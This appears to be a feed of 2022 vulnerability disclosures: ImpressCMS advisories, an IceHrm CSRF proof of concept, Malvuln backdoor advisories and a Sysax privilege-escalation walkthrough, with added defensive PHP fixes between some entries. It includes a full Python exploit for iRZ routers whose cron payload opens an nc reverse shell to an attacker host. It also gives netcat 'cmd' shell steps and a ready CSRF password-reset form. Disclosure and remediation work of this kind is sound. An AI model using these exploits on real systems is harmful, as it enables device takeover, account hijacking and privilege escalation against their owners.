<pre><code>---------------------------------------------------------------<br />ImpressCMS <= 1.4.3 (findusers.php) SQL Injection Vulnerability<br />---------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.impresscms.org<br /><br /><br />[-] Affected Versions:<br /><br />Version 1.4.3 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the /include/findusers.php script:<br /><br />281. $total = $user_handler->getUserCountByGroupLink(@$_POST["groups"], $criteria);<br />282.<br />283. $validsort = array("uname", "email", "last_login", "user_regdate", "posts");<br />284. $sort = (!in_array($_POST['user_sort'], $validsort)) ? "uname" : $_POST['user_sort'];<br />285. $order = "ASC";<br />286. if (isset($_POST['user_order']) && $_POST['user_order'] == "DESC") {<br />287. $order = "DESC";<br />288. }<br />289.<br />290. $criteria->setSort($sort);<br />291. $criteria->setOrder($order);<br />292. $criteria->setLimit($limit);<br />293. $criteria->setStart($start);<br />294. $foundusers = $user_handler->getUsersByGroupLink(@$_POST["groups"], $criteria, TRUE);<br /><br />User input passed through the "groups" POST parameter is not properly <br />sanitized before being passed to the <br />icms_member_Handler::getUserCountByGroupLink() and <br />icms_member_Handler::getUsersByGroupLink() methods at lines 281 and 294. <br />These methods use the first argument to construct a SQL query without <br />proper validation, and this can be exploited by remote attackers to e.g. <br />read sensitive data from the "users" database table through <br />boolean-based SQL Injection attacks. The application allows for stacked <br />SQL queries, so this vulnerability could also be exploited to e.g. <br />create a new admin user and execute arbitrary PHP code.<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 1.4.4 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[19/01/2021] - Vendor notified through HackerOne<br />[29/01/2021] - Vulnerability acknowledged by the vendor<br />[03/02/2021] - CVE number assigned<br />[06/02/2022] - Version 1.4.3 released, vulnerability not correctly fixed<br />[11/02/2022] - Vendor was informed about the ineffective fix<br />[09/03/2022] - Version 1.4.4 released<br />[22/03/2022] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2021-26599 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://hackerone.com/reports/1081145<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2022-04<br /><br /><br /></code></pre>
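<p>Added example (not ImpressCMS code): the "groups" value above reaches the query builder as an opaque argument. A defensive handler reduces it to a list of positive integers and binds them as parameters, so the value can never carry SQL syntax. The PDO connection and the users / groups_users_link column names are assumptions for this sketch.</p>

```php
<?php
// Added example (not ImpressCMS code): how findusers.php-style group
// filtering can take an untrusted "groups" POST value safely.
// Assumptions: a PDO connection, a table with columns "uid" and "groupid"
// (names are placeholders, not the real ImpressCMS schema).

declare(strict_types=1);

/**
 * Reduce an arbitrary POST value to a list of positive integer group ids.
 * Anything that is not a whole-number string is rejected rather than
 * passed through, so the value can never carry SQL syntax.
 */
function normalizeGroupIds(mixed $input): array
{
    if ($input === null || $input === '') {
        return [];
    }
    $candidates = is_array($input) ? $input : [$input];
    $ids = [];
    foreach ($candidates as $candidate) {
        if (!is_string($candidate) && !is_int($candidate)) {
            throw new InvalidArgumentException('group id must be scalar');
        }
        $text = (string) $candidate;
        // ctype_digit rejects signs, spaces, quotes, comments and NUL bytes.
        if ($text === '' || !ctype_digit($text) || (int) $text <= 0) {
            throw new InvalidArgumentException("invalid group id: {$text}");
        }
        $ids[(int) $text] = true;           // de-duplicate while we go
    }
    return array_keys($ids);
}

/**
 * Count users linked to any of the given groups using bound parameters.
 * The IN (...) list is built only from "?" placeholders; the ids travel
 * separately as bound values and are never interpolated into SQL text.
 */
function countUsersByGroups(PDO $db, array $groupIds): int
{
    if ($groupIds === []) {
        // Mirror the "no filter" case without building an invalid IN ().
        $stmt = $db->query('SELECT COUNT(*) FROM users');
        return (int) $stmt->fetchColumn();
    }
    $placeholders = implode(',', array_fill(0, count($groupIds), '?'));
    $sql = "SELECT COUNT(DISTINCT u.uid) FROM users u "
         . "JOIN groups_users_link l ON l.uid = u.uid "
         . "WHERE l.groupid IN ({$placeholders})";
    $stmt = $db->prepare($sql);
    foreach (array_values($groupIds) as $i => $id) {
        $stmt->bindValue($i + 1, $id, PDO::PARAM_INT);
    }
    $stmt->execute();
    return (int) $stmt->fetchColumn();
}

// Constructed sample inputs: what a form would send, and what it must not.
$samples = [['1', '2', '2'], '3', ["1' OR 1=1 -- "], ['1;DROP TABLE users'], ''];
foreach ($samples as $sample) {
    try {
        echo json_encode($sample), ' => ', json_encode(normalizeGroupIds($sample)), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo json_encode($sample), ' => rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```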
<pre><code>--------------------------------------------------------------------------<br />ImpressCMS <= 1.4.2 (findusers.php) Incorrect Access Control Vulnerability<br />--------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.impresscms.org<br /><br /><br />[-] Affected Versions:<br /><br />Version 1.4.2 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the /include/findusers.php script:<br /><br />16. include "../mainfile.php";<br />17. xoops_header(false);<br />18.<br />19. $denied = true;<br />20. if (!empty($_REQUEST['token'])) {<br />21. if (icms::$security->validateToken($_REQUEST['token'], false)) {<br />22. $denied = false;<br />23. }<br />24. } elseif (is_object(icms::$user) && icms::$user->isAdmin()) {<br />25. $denied = false;<br />26. }<br />27. if ($denied) {<br />28. icms_core_Message::error(_NOPERM);<br />29. exit();<br />30. } }<br /><br />This script should be accessible to authenticated users only. However, <br />because of the "if" statement at lines 20-23, this script could be <br />accessed by unauthenticated attackers if they provide a valid <br />security token. Such a token is generated in several places within <br />the application, some of which do not require the user to be <br />authenticated, like the misc.php script. This might be exploited to <br />access otherwise restricted functionality of the application, which <br />in turn might allow the disclosure of information about the CMS users.<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 1.4.3 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[19/01/2021] - Vendor notified through HackerOne<br />[03/02/2021] - CVE number assigned<br />[06/02/2022] - Version 1.4.3 released<br />[22/03/2022] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2021-26598 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://hackerone.com/reports/1081137<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2022-03<br /><br /><br /></code></pre>
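<p>Added example (not ImpressCMS code): the check at lines 19-26 lets a security token stand in for an admin session. The PHP below puts the original predicate next to a hardened one that keeps the two questions apart (is the request genuine, and is the actor allowed) and runs both over constructed cases. The User class and the stand-in token validator are assumptions.</p>

```php
<?php
// Added example (not ImpressCMS code): separating "is this request
// genuine?" (an anti-CSRF token) from "is this actor allowed?" (an admin
// session), the distinction the findusers.php check collapses.
// The User class and the token validator are assumptions for this example.

declare(strict_types=1);

final class User
{
    public function __construct(private bool $admin) {}
    public function isAdmin(): bool { return $this->admin; }
}

/**
 * The original predicate: a valid token alone is enough, so a visitor who
 * obtained a token from any unauthenticated page is let through.
 */
function deniedOriginal(?User $user, ?string $token, callable $validateToken): bool
{
    $denied = true;
    if (!empty($token)) {
        if ($validateToken($token)) {
            $denied = false;
        }
    } elseif ($user !== null && $user->isAdmin()) {
        $denied = false;
    }
    return $denied;
}

/**
 * Hardened predicate: the token never substitutes for identity. Access
 * requires an authenticated admin, and a valid token on top of that.
 */
function deniedHardened(?User $user, ?string $token, callable $validateToken): bool
{
    if ($user === null || !$user->isAdmin()) {
        return true;                       // authentication and authorization first
    }
    return empty($token) || !$validateToken($token);
}

// Stand-in validator: in the real application this would be the framework's
// token check; here any token starting with "tok-" counts as valid.
$validateToken = fn (string $t): bool => str_starts_with($t, 'tok-');

// Constructed cases: (user, token, outcome a correct design should give)
$cases = [
    'anonymous + valid token'  => [null,            'tok-abc', 'deny'],
    'anonymous, no token'      => [null,            null,      'deny'],
    'non-admin + valid token'  => [new User(false), 'tok-abc', 'deny'],
    'admin, no token'          => [new User(true),  null,      'deny'],
    'admin + valid token'      => [new User(true),  'tok-abc', 'allow'],
];

printf("%-26s %-10s %-10s\n", 'case', 'original', 'hardened');
foreach ($cases as $name => [$user, $token, $expected]) {
    $orig = deniedOriginal($user, $token, $validateToken) ? 'deny' : 'allow';
    $hard = deniedHardened($user, $token, $validateToken) ? 'deny' : 'allow';
    printf("%-26s %-10s %-10s%s\n", $name, $orig, $hard,
        $hard === $expected ? '' : '  ** unexpected');
}
```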
<pre><code>-----------------------------------------------------------------<br />ImpressCMS <= 1.4.2 (image-edit.php) Path Traversal Vulnerability<br />-----------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.impresscms.org<br /><br /><br />[-] Affected Versions:<br /><br />Version 1.4.2 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the <br />/libraries/image-editor/image-edit.php script:<br /><br />161. if (@copy ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . $simage_temp, $categ_path . $simage->getVar ( 'image_name' ) )) {<br />162. if (@unlink ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . $simage_temp )) {<br />163. $msg = _MD_AM_DBUPDATED;<br /><br />[...]<br /><br />190. } else {<br />191. if (copy ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . $simage_temp, $categ_path . $imgname )) {<br />192. @unlink ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . $simage_temp );<br />193. }<br /><br />User input passed through the "image_temp" parameter is not properly <br />sanitized before being used in a call to the unlink() function at lines <br />162 and 192. This can be exploited by authenticated attackers to carry <br />out Path Traversal attacks and delete arbitrary files in the context of <br />the web server process. This vulnerability could also be exploited to <br />disclose the content of arbitrary files in case the web server allows <br />for directory listing.<br /><br />[-] Solution:<br /><br />Upgrade to version 1.4.3 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[19/01/2021] - Vendor notified through HackerOne<br />[29/01/2021] - Vulnerability acknowledged by the vendor<br />[03/02/2021] - CVE number assigned<br />[06/02/2022] - Version 1.4.3 released<br />[22/03/2022] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2021-26601 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://hackerone.com/reports/1081878<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2022-02<br /><br /><br /></code></pre>
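<p>Added example (not ImpressCMS code): the missing step at lines 162 and 192 is confining the user-supplied temp-file name to the temp directory before copy() or unlink() touches it. The PHP below does that for names that may not exist yet, then exercises it against constructed names in a throw-away directory; the directory names are placeholders.</p>

```php
<?php
// Added example (not ImpressCMS code): confining a user-supplied temp-file
// name to the temp directory before copy()/unlink(), the check missing at
// lines 162 and 192 of image-edit.php. Directory names are placeholders.

declare(strict_types=1);

/**
 * Return the absolute path of $name inside $tempDir, or null if the name
 * would escape it. Works for names that do not exist yet (realpath() alone
 * fails on those), so it can be used before copy() as well as unlink().
 */
function resolveTempFile(string $tempDir, string $name): ?string
{
    $base = realpath($tempDir);
    if ($base === false) {
        return null;                                 // temp dir itself is missing
    }
    // Reject anything that is not a single path component: slashes,
    // backslashes, NUL bytes and the dot directories all fail here.
    if ($name === '' || $name === '.' || $name === '..'
        || str_contains($name, "\0") || basename($name) !== $name) {
        return null;
    }
    $candidate = $base . DIRECTORY_SEPARATOR . $name;
    // Defence in depth: if the file exists, its canonical path must still
    // sit directly under $base (catches symlinks planted in the temp dir).
    $canonical = realpath($candidate);
    if ($canonical !== false && dirname($canonical) !== $base) {
        return null;
    }
    return $candidate;
}

/** Delete a temp file only when its name survives the confinement check. */
function unlinkTempFile(string $tempDir, string $name): bool
{
    $path = resolveTempFile($tempDir, $name);
    if ($path === null || !is_file($path)) {
        return false;
    }
    return unlink($path);
}

// Constructed demonstration in a throw-away directory.
$tempDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'imanager-demo-' . getmypid();
mkdir($tempDir, 0700);
file_put_contents($tempDir . DIRECTORY_SEPARATOR . 'upload.png', 'x');

$names = ['upload.png', '../upload.png', 'sub/upload.png', "upload.png\0.txt", '..'];
foreach ($names as $name) {
    $resolved = resolveTempFile($tempDir, $name);
    printf("%-24s => %s\n", json_encode($name), $resolved === null ? 'REJECTED' : 'ok');
}
var_dump(unlinkTempFile($tempDir, '../upload.png'));   // traversal attempt: file left alone
var_dump(unlinkTempFile($tempDir, 'upload.png'));      // legitimate name: file removed
rmdir($tempDir);
```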
<pre><code># Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover<br /># Date: 18/03/2022<br /># Exploit Author: Devansh Bordia<br /># Vendor Homepage: https://icehrm.com/<br /># Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS<br /># Version: 31.0.0.OS<br /># Tested on: Windows 10<br /><br />1. About - ICEHRM<br />IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible.<br /><br />2. Description:<br />The application has an update password feature with a CSRF vulnerability that allows an attacker to change the password of any arbitrary user, leading to an account takeover.<br /><br />3. Steps To Reproduce:<br />- Create a user named Gaurav with the Employee permission using the Admin user of the application and set his password.<br />- Now log into the application using his credentials and navigate to the Update Password feature to change the password.<br />- Intercept the request in the proxy: a GET request is used to change the password and NO CSRF token is being used.<br />- Using Burp Suite, create a CSRF PoC and save it as exploit.html.<br />- Now change the password in the PoC to any password we want.<br />- Open this PoC in the same browser session and click the submit button.<br />- When logging into the application again, the password has been reset for the account, leading to account takeover.<br /><br />4. 
Vulnerable Request:<br /><br />GET<br />/app/service.php?t=Employee&a=ca&sa=changePassword&mod=modules=employees&req={"current":"Test@123<br />","pwd":"Dummy@123"} HTTP/1.1<br />Host: localhost:8070<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)<br />Gecko/20100101 Firefox/98.0<br />Accept: application/json, text/plain, */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Referer:<br />http://localhost:8070/app/?g=modules&n=employees&m=module_Personal_Information<br />Cookie: PHPSESSID=k8d27ve456j0jb56ga885j1vvb<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />5. Exploit POC (exploit.html)<br /><br /><html><br /><br /><!-- CSRF PoC - generated by Burp Suite Professional --><br /><br /><body><br /><br /><script>history.pushState('', '', '/')</script><br /><br /><form action="http://localhost:8070/app/service.php"><br /><br /><input type="hidden" name="t" value="Employee" /><br /><br /><input type="hidden" name="a" value="ca" /><br /><br /><input type="hidden" name="sa" value="changePassword" /><br /><br /><input type="hidden" name="mod" value="modules=employees" /><br /><br /><input type="hidden" name="req"<br />value="{"current":"Test@123","pwd":"Dummy@123"}"<br />/><br /><br /><input type="submit" value="Submit request" /><br /><br /></form><br /><br /></body><br /><br /></html><br /><br /></code></pre>
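<p>Added example (not IceHrm code): the checks a password-change endpoint needs so that a cross-site form submission like exploit.html above is refused. It models the request as a plain array so the logic runs without a server; the function and session key names are assumptions, and Test@123 is reused from the page's sample request.</p>

```php
<?php
// Added example (not IceHrm code): what a password-change endpoint needs so
// that a cross-site form post like exploit.html is rejected. Names
// (rejectPasswordChange, the session keys) are assumptions for this example;
// the request is modelled as a plain array so the logic runs without a server.

declare(strict_types=1);

/** Issue a per-session token; store it server-side, send it with the form. */
function issueCsrfToken(array &$session): string
{
    $session['csrf_token'] = bin2hex(random_bytes(32));
    return $session['csrf_token'];
}

/**
 * Decide whether a password-change request may proceed.
 * Returns null when allowed, otherwise the reason it was refused.
 */
function rejectPasswordChange(array $request, array $session): ?string
{
    // 1. State changes never ride on GET: a form with no method attribute,
    //    an image source, or a plain link must not be able to trigger them.
    if (($request['method'] ?? 'GET') !== 'POST') {
        return 'method: state change requires POST';
    }
    // 2. Fetch metadata: browsers label cross-site navigations and submissions.
    $site = $request['headers']['Sec-Fetch-Site'] ?? null;
    if ($site !== null && !in_array($site, ['same-origin', 'none'], true)) {
        return "fetch-metadata: Sec-Fetch-Site={$site}";
    }
    // 3. Unguessable per-session token, compared in constant time.
    $sent = $request['body']['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    if ($expected === '' || !is_string($sent) || !hash_equals($expected, $sent)) {
        return 'token: missing or mismatched csrf_token';
    }
    // 4. Re-authentication: the current password must verify against the
    //    stored hash, independent of the session cookie the browser attached.
    $current = $request['body']['current'] ?? '';
    if (!is_string($current) || !password_verify($current, $session['password_hash'])) {
        return 'reauth: current password incorrect';
    }
    return null;
}

// Constructed session for the logged-in victim (Test@123 is the page's sample value).
$session = ['password_hash' => password_hash('Test@123', PASSWORD_DEFAULT)];
$token = issueCsrfToken($session);

// Constructed requests: the cross-site PoC shape, a POST variant, then a legitimate one.
$crossSiteGet = [
    'method'  => 'GET',
    'headers' => ['Sec-Fetch-Site' => 'cross-site'],
    'body'    => ['current' => 'Test@123', 'pwd' => 'Dummy@123'],
];
$crossSitePost = $crossSiteGet;
$crossSitePost['method'] = 'POST';
$legit = [
    'method'  => 'POST',
    'headers' => ['Sec-Fetch-Site' => 'same-origin'],
    'body'    => ['current' => 'Test@123', 'pwd' => 'Dummy@123', 'csrf_token' => $token],
];

$requests = ['cross-site GET' => $crossSiteGet, 'cross-site POST' => $crossSitePost, 'legitimate' => $legit];
foreach ($requests as $label => $req) {
    printf("%-16s %s\n", $label, rejectPasswordChange($req, $session) ?? 'allowed');
}
```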
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/eba3dd81723ddf33621fd85ded577920.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.BirdSpy.b<br />Vulnerability: Weak Hardcoded Credentials<br />Family: BirdSpy<br />Type: PE32<br />MD5: eba3dd81723ddf33621fd85ded577920<br />Vuln ID: MVID-2022-0523<br />Dropped files: WinSock.exe<br />Disclosure: 03/21/2022<br />Description: The malware listens on TCP port 50829. Authentication is required, however the password "ccbird" is weak and hardcoded in the PE file.<br /><br />00401E0E mov esi, offset Data ; "ccbird"<br />00401E13 push 0 ; flags<br />00401E15 push esi ; Str<br /><br />Built-in commands:<br />==================<br />byby "kill the malware"<br />delp "terminate process"<br />exec "shellexecute pgm"<br />dlog HATE "send a message"<br />getd "get drives"<br />regw "write to registry"<br /><br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 50829<br />ccbird<br />pwok Welcome to Januse's BirdSPY<br />Januse0128<br />sysJanuse0128gsys<br />msgeSystem: Windows NT<br />Version:6.2<br />BuildNumber:9200<br />System Info:''Januse0128<br />Januse0128dlog HATE <br />Januse0128bird<br />BirdSPY Release version 1..by JanuseChiu<br />ME.NCU.EDU.TW...YAJanuse0128<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. 
The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: iRZ Mobile Router - CSRF to RCE<br /># Google Dork: intitle:"iRZ Mobile Router"<br /># Date: 2022-03-18<br /># Exploit Author: Stephen Chavez & Robert Willis<br /># Vendor Homepage: https://en.irz.ru/<br /># Software Link: https://github.com/SakuraSamuraii/ez-iRZ<br /># Version: Routers through 2022-03-16<br /># Tested on: RU21, RU21w, RL21, RU41, RL01<br /># CVE : CVE-2022-27226<br /><br />import os<br />import requests<br />import json<br />import subprocess<br /><br />option = "0"<br /><br /><br />def main():<br />    print("####################################################")<br />    print("# Welcome to IRZ CSRF to RCE Exploit - version 1.0 #")<br />    print("####################################################")<br />    print()<br />    print("## by RedragonX of WHG & rej_ex of SAKURA SAMURAI ##")<br />    print()<br />    print("1. Post Authentication RCE (Needs Credentials)")<br />    print("2. CSRF to RCE (No Credentials)")<br />    print()<br />    runit()<br /><br /><br />def runit():<br />    option = input("Select an option: ")<br />    if option == "1":<br />        exploit1()<br />    elif option == "2":<br />        exploit2()<br />    else:<br />        print("You must select '1' or '2'. Exiting.")<br /><br /><br />def exploit1():<br />    print("## Running Post Auth RCE exploit")<br />    print()<br />    print()<br />    router_ip = input("## Enter the router ip to exploit: ")<br />    router_port = int(<br />        input("## Enter the victim router web page port (default is 80): ") or "80")<br /><br />    router_user = input("## Enter the username for the router login: ")<br />    router_pass = input("## Enter the password for the router login: ")<br /><br />    LHOST = input("## Enter the LHOST for the router reverse shell: ")<br />    LPORT = input("## Enter the LPORT for the router reverse shell: ")<br /><br />    router_url = f'http://{router_ip}:{router_port}'<br /><br />    nc1_str = f'Start a listener with the following command: nc -lvp {LPORT}'<br /><br />    input(nc1_str + "\n\nPress enter once you do")<br /><br />    send_json_payload(router_url, router_user, router_pass, LHOST, LPORT)<br /><br /><br />def send_json_payload(router_url, router_user, router_pass, lhost_ip, lhost_port):<br /><br />    intro = f'Sending the payload to {router_url}\n'<br />    print(intro)<br />    payload_str = '{"tasks":[{"enable":true,"minutes":"*","hours":"*","days":"*","months":"*","weekdays":"*","command":"rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc ' + \<br />        f'{lhost_ip} {lhost_port} ' + \<br />        '>/tmp/f"}],"_board":{"name":"RL21","platform":"irz_mt02","time":"Wed Mar 16 16:43:20 UTC 2022"}}'<br /><br />    payload_json = json.loads(payload_str)<br /><br />    s = requests.Session()<br /><br />    s.auth = (router_user, router_pass)<br /><br />    s.headers.update(<br />        {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"})<br />    s.headers.update({"X-Requested-With": "XMLHttpRequest"})<br />    s.headers.update({"Origin": router_url})<br />    s.headers.update({"Referer": router_url})<br /><br />    s.post(router_url + "/api/crontab", json=payload_json)<br /><br />    exploit_str = f'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip} 443 >/tmp/f'<br /><br />    print(<br />        "Request sent! You may have to wait about 2 minutes to get a shell. \nFirst shell will die due to crontab job. Start a new listener on a new port [e.g. 443], and run the following command: " + exploit_str)<br />    print("To fix TTY: type telnet 0.0.0.0 in the shell")<br /><br /><br />def exploit2():<br /><br />    print("## Running CSRF to RCE exploit")<br />    print()<br />    print()<br />    router_ip = input("## Enter the router ip to exploit: ")<br />    router_port = int(<br />        input("## Enter the victim router web page port (default is 80): ") or "80")<br /><br />    LHOST = input("## Enter the LHOST for the router reverse shell: ")<br />    LPORT = input("## Enter the LPORT for the router reverse shell: ")<br /><br />    load_csrf_poc_file(router_ip, router_port, LHOST, LPORT)<br /><br /><br />def load_csrf_poc_file(router_ip, router_port, lhost_ip, lhost_port):<br /><br />    file_path = os.path.dirname(__file__) + os.sep + "poc.template.html"<br /><br />    if os.path.isfile(file_path):<br />        with open(file_path) as poc_file:<br />            original_poc_data_str = poc_file.read()<br /><br />        new_html = original_poc_data_str.replace("{router_ip}", router_ip)<br />        new_html = new_html.replace(<br />            "{router_port}", str(router_port))<br /><br />        lhost_split_arr = lhost_ip.split(".")<br /><br />        if len(lhost_split_arr) == 4:<br /><br />            new_html = new_html.replace(<br />                "{lhost_ip_octect_1}", lhost_split_arr[0])<br /><br />            new_html = new_html.replace(<br />                "{lhost_ip_octect_2}", lhost_split_arr[1])<br /><br />            new_html = new_html.replace(<br />                "{lhost_ip_octect_3}", lhost_split_arr[2])<br />            new_html = new_html.replace(<br />                "{lhost_ip_octect_4}", lhost_split_arr[3])<br /><br />            new_html = new_html.replace(<br />                "{lhost_port}", lhost_port)<br /><br />            new_file_path = os.path.dirname(<br />                __file__) + os.sep + "poc.new.html"<br />            try:<br />                with open(new_file_path, 'w') as new_file:<br />                    new_file.write(new_html)<br /><br />                print()<br />                print(<br />                    f'New file written to {new_file_path}. Host this file')<br />            except FileNotFoundError:<br />                print("You had an error writing to the file, doesn't exist.")<br />        else:<br />            print(f'{lhost_ip} is not a proper IPV4 address.')<br /><br />    else:<br />        print(f'{file_path} not found')<br /><br /><br />main()<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/dcbc237f21839a6514c8321d5fa631a4.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Agent.bxxn<br />Vulnerability: Open Proxy<br />Description: The malware listens on TCP port 1080. Third-party attackers who can connect to the infected system can relay requests from the original connection to the destination and then back to the origination system. Attackers may then be able to launch attacks, download files or port scan third party systems and it will appear as the attacks originated from that infected host.<br />Family: Agent<br />Type: PE32<br />MD5: dcbc237f21839a6514c8321d5fa631a4<br />Vuln ID: MVID-2022-0522<br />Disclosure: 03/21/2022<br /><br />Exploit/PoC:<br />curl socks4://192.168.18.125:1080 http://192.168.18.128:21<br />220 INetSim FTP Service ready.<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Author: bzyo (@bzyo_)<br /># Exploit Title: Sysax FTP Automation 6.9.0 - Privilege Escalation<br /># Date: 03-20-2022<br /># Vulnerable Software: Sysax FTP Automation 6.9.0<br /># Vendor Homepage: https://www.sysax.com/<br /># Version: 6.9.0<br /># Software Link: https://www.sysax.com/download/sysaxauto_setup.msi<br /># Tested on: Windows 10 x64<br /><br /># Details:<br />The Sysax Scheduler Service runs as Local System. By default the application allows low privilege users to create and run backup jobs as users other than themselves. By removing the option to run as the current user or another user, the task will run as System. A low privilege user could abuse this to escalate their privileges to Local System.<br /><br /># Prerequisites:<br />To successfully exploit this vulnerability, an attacker must already have local access to a system running Sysax FTP Automation using a low privileged user account.<br /><br /># Exploit:<br />Logged in as a low privileged account:<br /><br />1. Create folder c:\temp<br />2. Download netcat (nc.exe) to c:\temp<br />3. Create file 'pwn.bat' in c:\temp with contents<br /> c:\temp\nc.exe localhost 1337 -e cmd<br />4. Open command prompt and netcat listener<br /> nc -nlvvp 1337<br />5. Open sysaxschedscp.exe from C:\Program Files (x86)\SysaxAutomation<br />6. Select Setup Scheduled/Triggered Tasks<br /> - Add task (Triggered)<br /> - Update folder to monitor to be c:\temp<br /> - Check 'Run task if a file is added to the monitor folder or subfolder(s)'<br /> - Choose 'Run any other Program' and choose c:\temp\pwn.bat<br /> - Uncheck 'Login as the following user to run task'<br /> - Finish and Save<br />7. Create new text file in c:\temp<br />8. Check netcat listener<br /> C:\WINDOWS\system32>whoami<br /> whoami<br /> nt authority\system<br /><br /></code></pre>
<pre><code>-----------------------------------------------------------------------<br />ImpressCMS <= 1.4.2 (autologin.php) Authentication Bypass Vulnerability<br />-----------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.impresscms.org<br /><br /><br />[-] Affected Versions:<br /><br />Version 1.4.2 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the /plugins/preloads/autologin.php script:<br /><br />45. $uname = $myts->stripSlashesGPC($autologinName);<br />46. $pass = $myts->stripSlashesGPC($autologinPass);<br />47. if (empty($uname) || is_numeric($pass)) {<br />48. $user = false ;<br />49. } else {<br />50. // V3<br />51. $uname4sql = addslashes($uname);<br />52. $criteria = new icms_db_criteria_Compo(new icms_db_criteria_Item('login_name', $uname4sql));<br />53. $user_handler = icms::handler('icms_member_user');<br />54. $users = $user_handler->getObjects($criteria, false);<br />55. if (empty($users) || count($users) != 1) {<br />56. $user = false ;<br />57. } else {<br />58. // V3.1 begin<br />59. $user = $users[0] ;<br />60. $old_limit = time() - (defined('ICMS_AUTOLOGIN_LIFETIME') ? ICMS_AUTOLOGIN_LIFETIME : 604800);<br />61. list($old_Ynj, $old_encpass) = explode(':', $pass);<br />62. if (strtotime($old_Ynj) < $old_limit || md5($user->getVar('pass') .<br />63. ICMS_DB_PASS . ICMS_DB_PREFIX . $old_Ynj) != $old_encpass)<br />64. {<br />65. $user = false;<br />66. }<br /><br />User input passed through the "autologin_uname" and "autologin_pass" <br />cookie values is used at lines 51-54 to fetch a user object from <br />the database, and then at lines 62-63 to check the correctness of the <br />user's password. The vulnerability exists because of an unsafe way of <br />comparing those values: the comparison operator != is used <br />instead of !== within the "if" statement at lines 62-63. The latter <br />operator treats two values as equal only if they are equal and of the <br />same type, while the former compares them after "type juggling". <br />This might be exploited to bypass the authentication <br />mechanism and log in as any user 